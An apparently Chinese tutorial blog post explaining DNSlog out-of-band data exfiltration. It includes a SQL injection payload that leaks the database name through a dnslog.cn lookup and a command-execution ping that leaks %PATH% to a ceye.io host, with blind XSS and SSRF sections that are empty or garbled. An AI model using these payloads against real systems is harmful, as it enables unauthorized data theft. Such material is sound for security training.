1. 全栈程序员必看首页

DNSlog介绍

全栈程序员-站长 未分类 阅读 3

DNSlog介绍0x00DNSlog 介绍首先我们知道 DNS 是起 ip 与域名的解析的服务 通过 ip 可以解析到对应的域名 DNSlog 就是储存在 DNS 上的域名相关的信息 它记录着你对域名或者 IP 的访问信息 也就是类似于日志文件 0x01DNSlog 回显原理首先了解一下多级域名的概念 我们知道因特网采用树状结构命名方法 按组织结构划分域是一个名字空间中一个被管理的划分 域可划分为子域 子域再可被划分为多级域名称为一级域名 二级域名 三级域名 从一个域名地址来从右到左依次是顶级域名 二级域名 三级域名 例如 gao

0x00 DNSlog 介绍

首先我们知道DNS是起ip与域名的解析的服务,通过ip可以解析到对应的域名。DNSlog就是储存在DNS上的域名相关的信息,它记录着你对域名或者IP的访问信息,也就是类似于日志文件,

0x01 DNSlog回显原理

0x02 DNSlog 应用

0x03 DNSlog回显注入条件

0x04 DNSlog -sql注入

?id=1' and if((select load_file(concat('\\\\',(select database()),'.tlyypi.dnslog.cn\\abc'))),1,0)--+

记录到靶场数据库信息
在回显数据时,域名能够接受的字符是有条件限制的,某些不适合作为域名的特殊字符可能会被屏蔽掉,针对这种情况我们也可以base64编码后再进行请求。

0x05 DNSlog 其他应用

1.xss盲打

""

2.SSRF

"... 
   ..."

3.命令执行

" ping %PATH%.pxxx.ceye.io ..." 
 
  " > %all;
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/208181.html原文链接:https://javaforall.net

(0)
0 0

关于作者

全栈程序员-站长的头像

全栈程序员-站长

133.5K 文章
3 粉丝
本网站汇聚当前互联网主流语音,持续更新,欢迎关注公众号“全栈程序员社区”
上一篇 2026年3月19日 下午12:10
下一篇 2026年3月19日 下午12:10


相关推荐

  • ug图改变颜色_unity改变image透明度

    ug图改变颜色_unity改变image透明度

    ug图改变颜色_unity改变image透明度UGUI图片将其他颜色去除,显示灰色图片本例适用于UGUI一般项目中会有一些图标,当你拥有该图标显示为彩色图标,一般项目中最占资源的就是图片,不允许添加一张彩色图片,一张灰色图片,必须通过一些方法将彩色图标的颜色去掉,获取图标的灰色值。UGUI自带了一个Shader,Sprites/Default,默认给了一个添加该Shader的材质球 1Shader”U

    全栈程序员-站长的头像 全栈程序员-站长
    2025年11月11日
    7
  • Allegro转换PADS终极篇…..

    Allegro转换PADS终极篇…..

    Allegro转换PADS终极篇…..allegro 转 pads 终极篇现有一种比较简便的方法是 用 AD 导入 Allegro 的 pcb 再将 AD 的 PCB 转成 PADS 这种方法简单易操作

    全栈程序员-站长的头像 全栈程序员-站长
    2026年3月18日
    3
  • 解决Oracle数据库1521端口telnet不通问题

    解决Oracle数据库1521端口telnet不通问题

    解决Oracle数据库1521端口telnet不通问题现象:服务器的ip地址可以ping通,但是安装oracle过程中的指定的“1521”端口telnet不通过解决办法:1、确保防火墙对1521端口开启; 2、修改oracle安装之后的文件tnsnames.ora(F:\install\product\11.2.0\dbhome_1\NETWORK\ADMIN\tnsnames.ora)中“HOST”的值为”计算机全名“(桌面属性\高级

    全栈程序员-站长的头像 全栈程序员-站长
    2022年5月27日
    554
  • sha1给出了三种新的sha版本_sha1怎么下载

    sha1给出了三种新的sha版本_sha1怎么下载

    sha1给出了三种新的sha版本_sha1怎么下载注:如果出现【’keytool’不是内部或外部命令,也不是可运行的程序或批处理文件。】请参照下面的链接https://blog.csdn.net/csdnhejingzhou/article/details/50643246开发版SHA11.在AndroidStudio最下面找到Terminal点击2.切换到C盘,cd到Users\Administrator\.android…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年8月11日
    21
  • Bson「建议收藏」

    Bson「建议收藏」

    Bson

    全栈程序员-站长的头像 全栈程序员-站长
    2022年2月21日
    56
  • oracle 存储过程举例,oracle存储过程举例讲解

    oracle 存储过程举例,oracle存储过程举例讲解

    oracle 存储过程举例,oracle存储过程举例讲解oracle 存储过程创建和使用举例 1 创建存储过程 createorrepl 1as 创建包的声明 TYPEcurisref 声明一个指针 procedurep1 croutcur end createorrepl 1as 创建包体 procedurep1 croutcur

    全栈程序员-站长的头像 全栈程序员-站长
    2026年3月26日
    2

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号